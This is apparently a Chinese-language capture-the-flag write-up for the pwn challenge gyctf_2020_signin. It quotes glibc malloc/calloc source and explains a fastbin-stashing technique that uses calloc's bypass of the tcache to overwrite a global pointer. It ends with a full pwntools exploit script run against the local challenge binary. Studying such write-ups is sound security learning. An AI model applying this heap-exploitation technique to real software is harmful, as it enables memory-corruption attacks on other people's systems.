gyctf_2020_signin

info
License
本文引用了部分来自 GNU C Library 的源码,源码取自 GNU C Library 基于 LGPLv2.1

注:本题目的运行环境使用的 glibc 为 2.27-3ubuntu1_amd64,但本文中展示的所有 glibc 代码为 2.34

WriteUp-gyctf_2020_signin

看到本文的各位师傅,请允许 Y7n05h 又翻出这段各位都熟悉无比的代码.能够发现从非空的 tcache 中取出 chunk 是在 __libc_malloc() 中完成的,而非在 _int_malloc_() 中.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
void *
__libc_malloc (size_t bytes)
{
mstate ar_ptr;
void *victim;

_Static_assert (PTRDIFF_MAX <= SIZE_MAX / 2,
"PTRDIFF_MAX is not more than half of SIZE_MAX");

if (!__malloc_initialized)
ptmalloc_init ();
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
if (!checked_request2size (bytes, &tbytes))
{
__set_errno (ENOMEM);
return NULL;
}
size_t tc_idx = csize2tidx (tbytes);

MAYBE_INIT_TCACHE ();

DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins
&& tcache
&& tcache->counts[tc_idx] > 0)
{
victim = tcache_get (tc_idx);
return tag_new_usable (victim);
}
DIAG_POP_NEEDS_COMMENT;
#endif

if (SINGLE_THREAD_P)
{
victim = tag_new_usable (_int_malloc (&main_arena, bytes));
assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
&main_arena == arena_for_chunk (mem2chunk (victim)));
return victim;
}

arena_get (ar_ptr, bytes);

victim = _int_malloc (ar_ptr, bytes);
/* Retry with another arena only if we were able to find a usable arena
before. */
if (!victim && ar_ptr != NULL)
{
LIBC_PROBE (memory_malloc_retry, 1, bytes);
ar_ptr = arena_get_retry (ar_ptr, bytes);
victim = _int_malloc (ar_ptr, bytes);
}

if (ar_ptr != NULL)
__libc_lock_unlock (ar_ptr->mutex);

victim = tag_new_usable (victim);

assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
ar_ptr == arena_for_chunk (mem2chunk (victim)));
return victim;
}

再看 __libc_calloc()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
void *
__libc_calloc (size_t n, size_t elem_size)
{
mstate av;
mchunkptr oldtop;
INTERNAL_SIZE_T sz, oldtopsize;
void *mem;
unsigned long clearsize;
unsigned long nclears;
INTERNAL_SIZE_T *d;
ptrdiff_t bytes;

if (__glibc_unlikely (__builtin_mul_overflow (n, elem_size, &bytes)))
{
__set_errno (ENOMEM);
return NULL;
}

sz = bytes;

if (!__malloc_initialized)
ptmalloc_init ();

MAYBE_INIT_TCACHE ();

if (SINGLE_THREAD_P)
av = &main_arena;
else
arena_get (av, sz);

if (av)
{
/* Check if we hand out the top chunk, in which case there may be no
need to clear. */
#if MORECORE_CLEARS
oldtop = top (av);
oldtopsize = chunksize (top (av));
# if MORECORE_CLEARS < 2
/* Only newly allocated memory is guaranteed to be cleared. */
if (av == &main_arena &&
oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
# endif
if (av != &main_arena)
{
heap_info *heap = heap_for_ptr (oldtop);
if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
}
#endif
}
else
{
/* No usable arenas. */
oldtop = 0;
oldtopsize = 0;
}
mem = _int_malloc (av, sz);

assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
av == arena_for_chunk (mem2chunk (mem)));

if (!SINGLE_THREAD_P)
{
if (mem == 0 && av != NULL)
{
LIBC_PROBE (memory_calloc_retry, 1, sz);
av = arena_get_retry (av, sz);
mem = _int_malloc (av, sz);
}

if (av != NULL)
__libc_lock_unlock (av->mutex);
}

/* Allocation failed even after a retry. */
if (mem == 0)
return 0;

mchunkptr p = mem2chunk (mem);

/* If we are using memory tagging, then we need to set the tags
regardless of MORECORE_CLEARS, so we zero the whole block while
doing so. */
if (__glibc_unlikely (mtag_enabled))
return tag_new_zero_region (mem, memsize (p));

INTERNAL_SIZE_T csz = chunksize (p);

/* Two optional cases in which clearing not necessary */
if (chunk_is_mmapped (p))
{
if (__builtin_expect (perturb_byte, 0))
return memset (mem, 0, sz);

return mem;
}

#if MORECORE_CLEARS
if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
{
/* clear only the bytes from non-freshly-sbrked memory */
csz = oldtopsize;
}
#endif

/* Unroll clear of <= 36 bytes (72 if 8byte sizes). We know that
contents have an odd number of INTERNAL_SIZE_T-sized words;
minimally 3. */
d = (INTERNAL_SIZE_T *) mem;
clearsize = csz - SIZE_SZ;
nclears = clearsize / sizeof (INTERNAL_SIZE_T);
assert (nclears >= 3);

if (nclears > 9)
return memset (d, 0, clearsize);

else
{
*(d + 0) = 0;
*(d + 1) = 0;
*(d + 2) = 0;
if (nclears > 4)
{
*(d + 3) = 0;
*(d + 4) = 0;
if (nclears > 6)
{
*(d + 5) = 0;
*(d + 6) = 0;
if (nclears > 8)
{
*(d + 7) = 0;
*(d + 8) = 0;
}
}
}
}

return mem;
}

相信各位都能发现 __libc_calloc()__libc_malloc() 的差别是很小的,通常情况下将 __libc_calloc() 视为 __libc_malloc() + memset() 是合理的.但除此之外还有一点区别是 __libc_calloc() 中缺少从非空的 tcache 取出 chunk 的部分,因此 calloc() 将优先从 fastbin 中分配 chunk

这也是本题目的利用的核心思路.

错误思路-tcache poisoning

Y7n05h 刚开始也是想采用 tcache poisoning 来完成本题,并寄希望与 free/malloc 的过程中能清除 cnt 实现第二次 edit.但很遗憾,此路并不通.通过此方式虽能将 chunk 分配在 ptr 上,但无法修改 ptr 的值.(至少 Y7n05h 没想到)

正确思路

此方式是从 Pwnki 师傅 的博客学来的.在这里感谢 Pwnki 师傅 师傅.

利用思路:

  1. 分配 8 个大小为 0x80 的 chunk 后全部 free,前 7 个塞满了 tcache,后一个进入 fastbin
  2. 在分配一个 chunk,这将从 tcache 中取出一个 chunk
  3. 修改在 1 中放入的 fastbin 中的 chunk 的 fd 的指针为 ptr - 0x10,注意这个行为使 glibc 认为 ptr - 0x10 是一个 chunk,则 ptr 则是这个 chunkfd
  4. 通过执行 backdoor,调用 callocfastbin 取出 chunk 并将其 fd 指向的 ptr - 0x10 作为一个 chunk 插入 tcache 链表.插入过程中 ptr 将作为 tcache_entrynext 字段被修改.

这些过程的相关代码:

1
2
3
4
5
6
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
uintptr_t key;
} tcache_entry;
1
2
3
4
5
6
7
8
9
10
11
12
#define REMOVE_FB(fb, victim, pp)			\
do \
{ \
victim = pp; \
if (victim == NULL) \
break; \
pp = REVEAL_PTR (victim->fd); \
if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp))) \
malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \
} \
while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim)) \
!= victim); \
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
     /* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (__glibc_unlikely (misaligned_chunk (tc_victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
if (SINGLE_THREAD_P)
*fb = REVEAL_PTR (tc_victim->fd);
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}

完整 exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *
path = '/home/admin/Downloads/gyctf_2020_signin'
elf = ELF(path)
r = process(path)


def i2b(n: int, Hex: bool = False):
return bytes(hex(n) if Hex else str(n), encoding="ascii")


def backdoor():
r.sendafter(b"?", b'6')


def add(idx: int):
r.sendafter(b"?", b'1')
r.sendafter(b"idx?\n", i2b(idx))


def delete(idx: int):
r.sendafter(b"?", b'3')
r.sendafter(b"idx?\n", i2b(idx))


def edit(idx: int, content: bytes):
r.sendafter(b"?", b'2')
r.sendafter(b"idx?\n", i2b(idx))
r.send(content)


addr = elf.symbols['ptr']-0x10
for i in range(8):
add(i)
for i in range(8):
delete(i)

add(8)
payload = p64(addr)
edit(7, payload)

backdoor()
r.interactive()

参考资料

1. Pwnki-gyctf_2020_signin.
2. PYozo_free-gyctf_2020_signin.